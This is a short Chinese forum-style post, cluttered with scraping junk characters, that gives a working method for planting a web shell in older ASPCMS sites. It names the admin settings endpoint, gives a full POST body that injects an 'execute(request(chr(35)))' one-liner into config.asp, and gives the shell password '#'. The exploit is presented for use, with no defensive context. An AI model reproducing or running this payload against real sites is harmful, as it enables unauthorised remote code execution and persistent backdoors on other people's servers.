老的ASPCMS版本的秒杀拿SHELL漏洞( z3 R! F) J" V( C1 S
3 @" l- M/ Q3 W7 g5 W
找到后台。。。然后. g4 f, [+ L$ ]
! Y6 I& e M8 L2 U: ^6 y
/admin/_system/AspCms_SiteSetting.asp?action=saves
9 r% T/ L: a9 _. l
' R5 g' W" K2 L* U直接POST
) t. ~8 {7 @2 @; b5 i/ G5 K( { + v9 Z' z, z1 S$ W' E6 c3 B
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
. @/ c! D! O4 U/ U. u8 _$ P
. ] O, V* U* A' m$ g再连接配置文件config.asp 密码为## u2 N" c! v) O0 l
|